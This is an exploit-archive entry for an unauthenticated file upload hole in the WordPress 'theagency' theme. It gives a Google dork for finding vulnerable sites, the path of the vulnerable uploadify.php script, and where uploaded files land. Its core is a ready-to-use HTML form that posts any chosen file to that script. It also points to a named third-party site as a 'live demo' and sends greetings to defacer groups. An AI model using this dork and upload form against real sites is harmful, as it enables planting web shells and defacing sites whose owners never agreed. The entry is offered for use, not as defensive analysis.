id: 27144
date: 02/28/2017
title: Wordpress Theagency Themes File Upload Vulnerability
author: Berandal
cves: 

##################################################################################
# Exploit Title : Wordpress Themes Theagency File Upload Vulnerability
# Author : Berandal
# Google Dork: inurl:/wp-content/themes/theagency
# Tested on: Win 7, Linux
# Blog : http://www.maxteroit.com/
# Video Proof : https://www.youtube.com/watch?v=Iuhj5wDOLbU
#################################################################################

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

# [!] Exploit : http://127.0.0.1/wordpress/wp-content/themes/theagency/includes/uploadify/uploadify.php

# [!] File Location : http://127.0.0.1/wp-content/themes/theagency/includes/uploadify/uploads/filename

#################################################################################
# [*] CSRF:
#################################################################################
<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/theagency/includes/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="SIKAT!">
</form>
</body>
</html>
#################################################################################
# [*] Live Demo:
#################################################################################
# http://birtandalgic.com/
#################################################################################
# [*] ABOUT:
#################################################################################
# Facebook: https://www.facebook.com/owlsquad.id
# Twitter: https://www.twitter.com/id_berandal
# Greetz : OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer
#################################################################################

#  0day.today [2023-03-27]  #